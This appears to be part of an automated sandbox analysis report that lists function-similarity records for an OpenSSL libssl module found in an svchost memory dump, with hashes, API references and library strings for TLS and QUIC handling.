                                                                                              • String ID:
                                                                                              • API String ID: 1403826838-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e3fde73c0907c6d1bdd10f0d0a2eb25f473c61afb0bfbc14c72bb83f05379019
                                                                                              • Instruction ID: f65419ce3e23e2542f7436af4d2a7466f87e603dd674eb17c269a40f2941efa7
                                                                                              • Opcode Fuzzy Hash: e3fde73c0907c6d1bdd10f0d0a2eb25f473c61afb0bfbc14c72bb83f05379019
                                                                                              • Instruction Fuzzy Hash: 09C092CAEEF503C7F222A7B9D49627C01909F51714F10CA32E92D002A2AC1CA29A4B42
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e71367a5cdd664070f3cd5486dcb2730325718983b9183ad3455429ea35ca620
                                                                                              • Instruction ID: 7620970db6bba09e11f78559f59b258b9209c62698198d4e7cb5ac9b34880f77
                                                                                              • Opcode Fuzzy Hash: e71367a5cdd664070f3cd5486dcb2730325718983b9183ad3455429ea35ca620
                                                                                              • Instruction Fuzzy Hash: 81C09BC9EDF503C7F1515375D44517C01904F51714F10C531D81D006619C1C51964742
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <error processing frame data>$ Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$ Datagram Length: %zu$ Frame: $ Packet$%02x$<zero length id>$<zero length token>$Received$Sent$Unknown
                                                                                              • API String ID: 4098839300-2049903181
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$X_new
                                                                                              • String ID: ssl3_set_crypto_state$ssl\record\methods\ssl3_meth.c
                                                                                              • API String ID: 3158630193-2049820303
                                                                                              Similarity
                                                                                              • API ID: strncmp$R_newR_set_debug$R_vset_error
                                                                                              • String ID: CONNE$GET $HEAD $POST $PUT $ssl\record\methods\tlsany_meth.c$tls_validate_record_header
                                                                                              • API String ID: 1021621777-2841161646
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$R_new$Final_ex$Init_exR_set_debugX_freeX_new$D_fetchJ_nid2snL_cleanseR_pop_to_markR_set_markmemcpymemset
                                                                                              • String ID: A$ssl3_generate_key_block$ssl\s3_enc.c
                                                                                              • API String ID: 2557040286-359777381
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: $HMAC$SHA2-256$ssl\statem\extensions_srvr.c$tls_construct_stoc_cookie
                                                                                              • API String ID: 193678381-4098586831
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$<zero length id>$<zero length token>$Initial
                                                                                              • API String ID: 4098839300-1860078395
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$0RTT$<zero length id>$<zero length token>
                                                                                              • API String ID: 4098839300-3071389416
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$1RTT$<zero length id>$<zero length token>
                                                                                              • API String ID: 4098839300-1594244681
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$<zero length id>$<zero length token>$Handshake
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$<zero length id>$<zero length token>$Retry
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_puts
                                                                                              • String ID: Illegal Alert Length$ Level=%s(%d), description=%s(%d)$ change_cipher_spec (1)$ Content Type = %s (%d) Length = %d$ Inner Content Type = %s (%d)$ epoch=%d, sequence_number=%04x%04x%04x$ TLS RecordHeader: Version = %s (0x%x)$ too short message$Message length parse error!$Received$Sent$UNKNOWN$unknown value
                                                                                              APIs
                                                                                              Strings
                                                                                              • 666666666666666666666666666666666666666666666666\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ssl3_set_crypto_state, xrefs: 00007FFBAB4748CF, 00007FFBAB4749AE
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$X_get0_cipher$Final_exX_copy_exX_freememcpy$D_get_sizeD_is_aO_get_typeR_get_modeX_new
                                                                                              • String ID: 666666666666666666666666666666666666666666666666\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ssl3_set_crypto_state
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: X509_$R_new$X_free$L_sk_numR_set_debug$L_sk_value$R_clear_errorX509_verify_certX_get0_chainX_initX_new_ex
                                                                                              • String ID: ssl\statem\statem_lib.c$ssl_add_cert_chain
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_get_typeR_vset_error
                                                                                              • String ID: ssl\t1_lib.c$tls12_check_peer_sigalg
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$Final_exInit_ex$L_cleanseR_newR_set_debugR_vset_errorX_freeX_new
                                                                                              • String ID: ssl3_generate_master_secret$ssl\s3_enc.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_errorX509_free
                                                                                              • String ID: SSL_use_certificate_file$ssl\ssl_rsa.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: X509_$E_freeL_sk_set_cmp_funcM_read_bio_X509$E_dupL_sk_findL_sk_pushO_ctrlO_freeO_newO_s_fileR_clear_errorR_newR_set_debugR_set_errorX509_freeX509_get_subject_name
                                                                                              • String ID: SSL_add_file_cert_subjects_to_stack$ssl\ssl_cert.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_client_hello
                                                                                              APIs
                                                                                              • OPENSSL_sk_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492AFC
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492B0B
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492B23
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • d2i_X509_NAME.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492BD0
                                                                                              • OPENSSL_sk_push.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492BEE
                                                                                              • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492C0A
                                                                                              • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492CEA
                                                                                              • X509_NAME_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492CF2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: L_sk_pop_freeX509_$E_freeL_sk_newL_sk_pushR_newR_set_debugR_vset_errord2i_
                                                                                              • String ID: parse_ca_names$ssl\statem\statem_lib.c
                                                                                              • API String ID: 1078948774-2141598178
                                                                                              • Opcode ID: c7b76cd4449573da7d42b1a079351f64b7b5a0f99ba7884a8bf6dd802beac5ab
                                                                                              • Instruction ID: 6b62f508b50267e2b72a3986592e5174ae5a48af216dead0ed6af2c7ea2713c4
                                                                                              • Opcode Fuzzy Hash: c7b76cd4449573da7d42b1a079351f64b7b5a0f99ba7884a8bf6dd802beac5ab
                                                                                              • Instruction Fuzzy Hash: 9C51B4A1F4E65281FA23AB72E8911BD6351EF84380F44C431EEBD42AB6DE2DE5858701
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_poll$SSL_poll currently does not support polling sockets$SSL_poll currently only supports QUIC SSL objects$SSL_poll does not currently support blocking operation$SSL_poll does not support unknown poll descriptor type %d$ssl\rio\poll_immediate.c
                                                                                              • API String ID: 1552677711-1312627168
                                                                                              • Opcode ID: f04a2d450dba436fa6427ef25b33032bde060a6b61b459dd1f9ddc99022ccb72
                                                                                              • Instruction ID: b3dc8088cf21e4f88cc98c1855fb3c05213c8de82e809b44774cf000c10de6f5
                                                                                              • Opcode Fuzzy Hash: f04a2d450dba436fa6427ef25b33032bde060a6b61b459dd1f9ddc99022ccb72
                                                                                              • Instruction Fuzzy Hash: E271C0B1B4EB8296EA26DF35E4102B96395FB84B80F549431DEAE177B0CE3CE445C740
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get_sizeR_vset_error
                                                                                              • String ID: derive_secret_key_and_iv$key$ssl\tls13_enc.c$tls13_hkdf_expand
                                                                                              • API String ID: 773136946-1769045784
                                                                                              • Opcode ID: 0231e931ef7cdaa0a56683b6b8689033dbc63919f11125f5bd0f8acc5763542b
                                                                                              • Instruction ID: 1c076242ed411d58926a9e7b3889481541e9d637afab86df160bd68746a9388c
                                                                                              • Opcode Fuzzy Hash: 0231e931ef7cdaa0a56683b6b8689033dbc63919f11125f5bd0f8acc5763542b
                                                                                              • Instruction Fuzzy Hash: 1791607660AB8282EB61DB22E4917AE77A4FB88B80F108435DFAD43B65DF3CD555C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: <EMPTY>$SSL_CONF_cmd$cmd=%s$cmd=%s, value=%s$ctrl_switch_option$ssl\ssl_conf.c
                                                                                              • API String ID: 1552677711-1544666551
                                                                                              • Opcode ID: 8394d6f49662b3752447eaa2c7e46edcf05cf4991946146562246dfa91965209
                                                                                              • Instruction ID: 46d03d556ef9c98c91a17178e3723bc21e21fb5e382edd74c3f7e9e4f041d7e5
                                                                                              • Opcode Fuzzy Hash: 8394d6f49662b3752447eaa2c7e46edcf05cf4991946146562246dfa91965209
                                                                                              • Instruction Fuzzy Hash: 9F6192A2B0A64282FB529B6AE4412F973A1EF84780F588436DE6C477F5DF3CD985C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_rx_handle_packet$client received initial token$new packet with old keys$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 2363558997-2370986996
                                                                                              • Opcode ID: 63c52f1f679ab2f8c704dffe7516243d4f98cfd88b06ed1081e41bf7ac340370
                                                                                              • Instruction ID: b1830102049fc844b03ca196ab29ce73f4661b77dce8245893987c3b16be9d96
                                                                                              • Opcode Fuzzy Hash: 63c52f1f679ab2f8c704dffe7516243d4f98cfd88b06ed1081e41bf7ac340370
                                                                                              • Instruction Fuzzy Hash: BB8179B1A0EB8186FB26DB70E5603BAB3A0EB45744F448435DFAE066A5DF3DE455C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$X_newmemcpy
                                                                                              • String ID: ssl\record\methods\tls13_meth.c$tls13_set_crypto_state
                                                                                              • API String ID: 3455081293-161958930
                                                                                              • Opcode ID: e3be309d963c88f2fe24521019dd4e2fc3f73837044a9501c9475d7630e1dba2
                                                                                              • Instruction ID: a5f9628559a62b9ad47a9479698f0e6841343a7bb72cb3611e06abf03ed13c19
                                                                                              • Opcode Fuzzy Hash: e3be309d963c88f2fe24521019dd4e2fc3f73837044a9501c9475d7630e1dba2
                                                                                              • Instruction Fuzzy Hash: B541A272A0968282E662DB76D5917BE7360EF85784F408131EE6C47AF6DF3CE148CB00
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_errorX_freeX_new_from_name
                                                                                              • String ID: ssl\s3_lib.c$ssl_generate_pkey_group
                                                                                              • API String ID: 1495955094-2105823734
                                                                                              • Opcode ID: 844b4cd634b56560445525d614e96ae7fb6d62c2002cb2220d5f785b33164284
                                                                                              • Instruction ID: 699205f3e41dd82371b5a1f3504c7e60b33f0bfc1850bd00150f067b2c7a6a45
                                                                                              • Opcode Fuzzy Hash: 844b4cd634b56560445525d614e96ae7fb6d62c2002cb2220d5f785b33164284
                                                                                              • Instruction Fuzzy Hash: 844163B1E5E74282E662E772E5926BE2311BF84780F408436ED7D47AB6DE6CE5088701
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                              • String ID: SSL_CTX_use_PrivateKey_file$ssl\ssl_rsa.c
                                                                                              • API String ID: 1899708915-1288404938
                                                                                              • Opcode ID: 566ff9b448db7582449d80dcdbec908e32c8caa8934769aaaa3b523820c779ea
                                                                                              • Instruction ID: 77a83e85d800906f76c2459effbf36925335ec52543ce582cece963b1ea6f445
                                                                                              • Opcode Fuzzy Hash: 566ff9b448db7582449d80dcdbec908e32c8caa8934769aaaa3b523820c779ea
                                                                                              • Instruction Fuzzy Hash: 2541B2A1A4EA4681F622EB72E8513FD2351EF84B80F54C036ED6D577B6DE3CE50A8301
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                              • String ID: SSL_use_RSAPrivateKey_file$ssl\ssl_rsa_legacy.c
                                                                                              • API String ID: 1899708915-461091929
                                                                                              • Opcode ID: 5cde4c806b710f76ed28160dbc15bad2ebd6843a0016fdf10aa6ab05bda00406
                                                                                              • Instruction ID: deeac1462d72cbdfe0729cfd270f45b6f6dcb370e54c8df0c926981d7306e086
                                                                                              • Opcode Fuzzy Hash: 5cde4c806b710f76ed28160dbc15bad2ebd6843a0016fdf10aa6ab05bda00406
                                                                                              • Instruction Fuzzy Hash: C23180B1A4E64381FA62E772D8921BD2351AF84B80F58C431ED7D477B7DE2CE50A8741
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A92F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A947
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A98D
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A9A5
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: set_client_ciphersuite$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 4275876640-3316213183
                                                                                              • Opcode ID: 0da9d00d88a3c9e4bc4e657cc29b7de6a08c5f5cfb86228f52ce337bad5db1ec
                                                                                              • Instruction ID: da6c8d986922608e429e8093f057fa299834d7178b20fb2d560999c257689f07
                                                                                              • Opcode Fuzzy Hash: 0da9d00d88a3c9e4bc4e657cc29b7de6a08c5f5cfb86228f52ce337bad5db1ec
                                                                                              • Instruction Fuzzy Hash: E781B3A1B0A68285E792DB72E4917BD2351EF44B84F04C431DF2D87BB6DE6DE4858740
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_set_error$L_sk_new_null
                                                                                              • String ID: SSL_dane_enable$ssl\ssl_lib.c
                                                                                              • API String ID: 960851727-1732324311
                                                                                              • Opcode ID: 83a753f3cd16f23e90cc5c6fc46ade45cdee53ad99802808ec23b49fcba1e73a
                                                                                              • Instruction ID: 29c554ac5a372336842be3cb09ee2611b84833c9f60ac10e51148f89e4bdf5df
                                                                                              • Opcode Fuzzy Hash: 83a753f3cd16f23e90cc5c6fc46ade45cdee53ad99802808ec23b49fcba1e73a
                                                                                              • Instruction Fuzzy Hash: D651D5B1A0A54282F7A29B36E4817BD2351EF40794F849135EE7D43AF9DF3CE4958701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$Y_free
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_cke_dhe
                                                                                              • API String ID: 2633058761-2145857467
                                                                                              • Opcode ID: 32861d7e0c462356a77c90ea6bdff1ef6e75bd714c85a65ad47899a9e052be1d
                                                                                              • Instruction ID: 292965b43863e170442ae6ceb1d7e212148877639f28a080cc0982d33651269d
                                                                                              • Opcode Fuzzy Hash: 32861d7e0c462356a77c90ea6bdff1ef6e75bd714c85a65ad47899a9e052be1d
                                                                                              • Instruction Fuzzy Hash: 64414DE1A5EA8281FA229B72D8D13BD6361EF40B80F44C531DE2D576B6DE3DE5468700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_family$R_set_debug$R_newR_set_error$E_newE_save
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_rx_handle_packet$ossl_quic_channel_raise_protocol_error_loc$packet header reserved bits$ssl\quic\quic_channel.c
                                                                                              • API String ID: 1562493706-209172816
                                                                                              • Opcode ID: 3fe0d78d965c727c65b80cbfd3ba234ad12b654d972b08e2f3a73d7082e785bc
                                                                                              • Instruction ID: 852e86f5632684593ac720099935ae4223ab2cbf0b91483d4c8d53851a25c9a3
                                                                                              • Opcode Fuzzy Hash: 3fe0d78d965c727c65b80cbfd3ba234ad12b654d972b08e2f3a73d7082e785bc
                                                                                              • Instruction Fuzzy Hash: 8FB191B2A0AA8186EA6ADB35D4603BA73A0FB45744F448136DFAE437A1DF3CE454C705
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp$R_newR_set_debugR_set_error
                                                                                              • String ID: ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list$ssl\ssl_ciph.c
                                                                                              • API String ID: 1930259724-2296690422
                                                                                              • Opcode ID: 2bf9c61d0cf00fcf681b01301d94d4c4e35cb472c0d7981903dc81469af40b39
                                                                                              • Instruction ID: 1e3fe5f7b5d91a1057de5f9dfb70b4eb9bf1348bda0ea3ec32066af222e428e7
                                                                                              • Opcode Fuzzy Hash: 2bf9c61d0cf00fcf681b01301d94d4c4e35cb472c0d7981903dc81469af40b39
                                                                                              • Instruction Fuzzy Hash: A64171B6E4AA069AE712CB35F8513783BA4EB44784F44C43ADE2E836B1DF2CE554C741
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl\ssl_lib.c$ssl_write_internal
                                                                                              • API String ID: 1552677711-1479096089
                                                                                              • Opcode ID: 0f7e84e985252aa8de3cc70d5b7bdf48916e1e6196117957bbcbb42a36f39f56
                                                                                              • Instruction ID: e432cba98b643bcc00d6ded517e26c1a803b437d62fc4a196fd1ce0792c3fc35
                                                                                              • Opcode Fuzzy Hash: 0f7e84e985252aa8de3cc70d5b7bdf48916e1e6196117957bbcbb42a36f39f56
                                                                                              • Instruction Fuzzy Hash: 1E517272A09A4182F7529B39E4912BD6361EB54B84F548135EE6C43BFADF3CD4958B00
                                                                                              APIs
                                                                                              • OSSL_ERR_STATE_restore.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450A89
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450AAC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450AC4
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B3C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B43
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B5B
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B96
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450BC7
                                                                                              • OSSL_ERR_STATE_new.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450BD8
                                                                                              • OSSL_ERR_STATE_save.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450BEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$R_newR_set_error$E_newE_restoreE_save
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 4176084029-936738589
                                                                                              • Opcode ID: 2f5d62f6c2d42027207889810569f5974fd8bd41f677c318e6c85848605e963a
                                                                                              • Instruction ID: fd58a20d37dcd01c952632132f99f749b49f894a1963f3d81c1c8c667fb33e4c
                                                                                              • Opcode Fuzzy Hash: 2f5d62f6c2d42027207889810569f5974fd8bd41f677c318e6c85848605e963a
                                                                                              • Instruction Fuzzy Hash: F15161B660EB8581EA62DB61F9507BAB3A4FB84784F048535EE9D03B69DF3CD445C700
                                                                                              APIs
